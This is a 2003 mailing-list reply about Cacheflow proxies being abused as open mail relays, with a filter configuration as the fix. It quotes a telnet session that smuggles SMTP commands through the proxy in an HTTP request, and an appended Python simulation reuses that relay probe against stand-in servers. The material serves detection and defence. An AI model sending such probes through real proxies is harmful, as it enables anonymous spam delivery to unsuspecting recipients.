List: incidents
Subject: Re: Cacheflow proxy abuse (revisited)
From: Tim Kennedy <tim () timkennedy ! net>
Date: 2003-09-12 15:19:44
Alain,
If you make sure all 4 of these lines are in your inline filter,
it will block both the GET and POST methods of making outbound
connections on a cacheflow.
--------------------------------------------------------------------------
cacheflow#conf t
cacheflow#(config)inline filter-list local ccc
https://.*:(443|80) service=yes
https://.*:[0-9]+/ service=no
http://.*:(443|80) service=yes
http://.*:[0-9]+/ service=no
ccc
--------------------------------------------------------------------------
Sorry, I left the second two (http) lines out, in my original mail.
I left the log of the original telnet session at the bottom of this
reply. When I add these lines to the cacheflow, and try to GET or
POST to another server, on another port, I get:
--------------------------------------------------------------------------
memnoch[1075]# telnet 10.0.2.190 80
Trying 10.0.2.190...
Connected to 10.0.2.190.
Escape character is '^]'.
POST / HTTP/1.1
HOST: mail.yellowbrix.com:25
HELO .
HTTP/1.0 403 Forbidden
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 2678
Content-Type: text/html
Connection: close
--------------------------------------------------------------------------
At least, it worked for me, and people have stopped relaying through
our cacheflow.
-Tim
On Fri, 12 Sep 2003, Alain Fauconnet wrote:
> Hello,
>
> Thanks for the info. That does prevent the CONNECT abuse, but not the
> POST abuse, which can be used almost in the same way (although a bit
> more difficult) to use a Cacheflow to hide one's tracks when spamming.
>
> Greets,
> _Alain_
>
> > --------------------------------------------------------------------------
> > telnet ip.or.hostname.of.cacheflow 80
> > GET / HTTP/1.1
> > HOST: mailserver.victim.com:25
> > HELO .
> > mail from: spammer@alter.net
> > rcpt to: target@unsuspecting.com
> > DATA
> > Subject: Look Ma! I'm an open relay
> > HI, you've been spammed through an open proxy, because of a bug in the
> > OS code. Have a Great Day!
> > -Spammer
> > .
> >
> > 220 mailserver.victim.com ESMTP Sendmail 8.12.9/8.12.9; Wed, 10 Sep 2003
> > 11:15:31 -0400
> > 500 5.5.1 Command unrecognized: "GET / HTTP/1.0"
> > 500 5.5.1 Command unrecognized: "HOST: memnoch.sugarat.net:25"
> > 250 mailserver.victim.com Hello CacheFlowServer@[xxx.x.x.xx], pleased to
> > meet you
> > 250 2.1.0 spammer@alter.net... Sender ok
> > 250 2.1.5 target@unsuspecting.com... Recipient ok
> > 354 Enter mail, end with "." on a line by itself
> > 250 2.0.0 h8AFFVfo011729 Message accepted for delivery
> > 500 5.5.1 Command unrecognized: "Cache-Control: max-stale=0"
> > 500 5.5.1 Command unrecognized: "Connection: Keep-Alive"
> > 500 5.5.1 Command unrecognized: "Client-ip: xx.xx.x.xxx"
> > 500 5.5.1 Command unrecognized: ""
> > ^]
> > telnet> close
> > Connection closed.
> >
> > --------------------------------------------------------------------------
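The mechanism in this thread, modelled end to end as an added example (this is not Cacheflow's code and not anything posted by Tim or Alain): a proxy that connects to whatever host:port the client names and forwards the HTTP header lines verbatim, talking to an SMTP server that answers each non-SMTP line with "500 Command unrecognized" and honours the SMTP verbs hidden among them. The same script implements the rule the four inline-filter lines express (only 80 and 443 as the target port, for both absolute URLs and the Host header, with CONNECT covered too) and shows the 403 the filtered proxy returns. The mail server and proxy are stand-ins written for this example, the host names and addresses are the thread's own placeholders, and the probe request is constructed. One caveat the thread does not settle: the script compares the parsed port as a number, whereas the appliance matches the regex `:(443|80)`; whether that regex, unanchored, would also accept `:8080` or `:4430` depends on the appliance's matcher, so it is worth testing on a real box.

```python
"""Proxy-as-open-relay check, modelled on the exchange in this thread.

Two stand-ins wired together: the port rule the four inline filter lines
express (only 80/443 as the target of a proxied request), and a minimal
imitation of how Sendmail answers whatever the proxy forwards. Host names,
addresses and the probe request are constructed for this example.
"""
from typing import Dict, List, Optional, Tuple
from urllib.parse import urlsplit

ALLOWED_PORTS = {80, 443}                 # what the filter-list lines permit
DEFAULT_PORT = {"http": 80, "https": 443}


def target_port(request_line: str, host_header: Optional[str]) -> Optional[int]:
    """Port the proxy would connect to: an absolute URL in the request line
    (what the filter regexes look at) wins, then the Host header, and a
    missing port means the scheme default. IPv6 literals are not handled."""
    method, _, rest = request_line.partition(" ")
    target = rest.rsplit(" ", 1)[0]                  # strip "HTTP/1.x"
    if method.upper() == "CONNECT":                  # CONNECT host:port
        _, _, port = target.rpartition(":")
        return int(port) if port.isdigit() else None
    if "://" in target:
        url = urlsplit(target)
        return url.port or DEFAULT_PORT.get(url.scheme)
    if host_header:
        host, _, port = host_header.strip().rpartition(":")
        if host and port.isdigit():
            return int(port)
    return 80


def filter_allows(request_line: str, host_header: Optional[str]) -> bool:
    """True when the inline filter lets the proxy make the connection."""
    return target_port(request_line, host_header) in ALLOWED_PORTS


def sendmail_stand_in(wire: bytes, server: str = "mailserver.victim.com"
                      ) -> Tuple[List[str], List[Dict[str, object]]]:
    """Answer a byte stream the way the Sendmail log in the thread shows:
    non-SMTP lines get 500, real verbs are honoured, so the HTTP framing is
    noise and the envelope inside it is accepted. Returns reply lines and
    the messages that got through."""
    replies = [f"220 {server} ESMTP stand-in"]
    accepted: List[Dict[str, object]] = []
    sender, rcpts, body, in_data = None, [], [], False
    for line in wire.decode("latin-1").replace("\r\n", "\n").split("\n"):
        if in_data:
            if line == ".":
                accepted.append({"from": sender, "to": rcpts, "body": "\n".join(body)})
                replies.append("250 2.0.0 Message accepted for delivery")
                sender, rcpts, body, in_data = None, [], [], False
            else:
                body.append(line)
            continue
        verb, _, arg = line.partition(" ")
        verb, arg = verb.upper(), arg.strip()
        if verb in ("HELO", "EHLO"):
            replies.append(f"250 {server} Hello, pleased to meet you")
        elif verb == "MAIL" and arg.lower().startswith("from:"):
            sender = arg[5:].strip()
            replies.append(f"250 2.1.0 {sender}... Sender ok")
        elif verb == "RCPT" and arg.lower().startswith("to:"):
            rcpts.append(arg[3:].strip())
            replies.append(f"250 2.1.5 {rcpts[-1]}... Recipient ok")
        elif verb == "DATA" and sender and rcpts:
            in_data = True
            replies.append('354 Enter mail, end with "." on a line by itself')
        elif verb == "QUIT":
            replies.append(f"221 2.0.0 {server} closing connection")
            break
        else:
            replies.append(f'500 5.5.1 Command unrecognized: "{line}"')
    return replies, accepted


# Constructed probe, shaped like the quoted telnet session: no blank line, so
# the proxy sees one long header block and forwards every line of it.
PROBE = (
    "GET / HTTP/1.1\r\n"
    "Host: mailserver.victim.com:25\r\n"
    "HELO .\r\n"
    "mail from: spammer@alter.net\r\n"
    "rcpt to: target@unsuspecting.com\r\n"
    "DATA\r\n"
    "Subject: relay test\r\n"
    "Relayed through the proxy.\r\n"
    ".\r\n"
).encode("latin-1")


def cacheflow_stand_in(request: bytes, filtered: bool
                       ) -> Tuple[bytes, List[Dict[str, object]]]:
    """Proxy side. filtered=True applies the port rule and answers 403 as in
    Tim's session; filtered=False models the proxy before the fix: request
    line downgraded to HTTP/1.0, every header line passed through, proxy
    headers appended (as the Sendmail log shows), sent to host:port."""
    lines = request.decode("latin-1").split("\r\n")
    host = next((l.split(":", 1)[1] for l in lines[1:]
                 if l.lower().startswith("host:")), None)
    if filtered and not filter_allows(lines[0], host):
        return b"HTTP/1.0 403 Forbidden\r\nConnection: close\r\n\r\n", []
    method, _, rest = lines[0].partition(" ")
    forwarded = [f"{method} {rest.rsplit(' ', 1)[0]} HTTP/1.0"] + lines[1:] + [
        "Cache-Control: max-stale=0", "Connection: Keep-Alive", ""]
    replies, accepted = sendmail_stand_in("\r\n".join(forwarded).encode("latin-1"))
    return "\r\n".join(replies).encode("latin-1"), accepted


def relay_test(filtered: bool) -> Tuple[str, int]:
    """First line the client sees and how many messages were accepted."""
    response, accepted = cacheflow_stand_in(PROBE, filtered)
    return response.decode("latin-1").split("\r\n")[0], len(accepted)


if __name__ == "__main__":
    for flag in (False, True):
        print("filtered" if flag else "unfiltered", "->", relay_test(flag))
```

Against a real appliance the same probe is what you would send with telnet or netcat; a 403 on the first line means the filter caught it, while an SMTP banner or any "250 2.0.0 ... accepted" line means the proxy is still a relay.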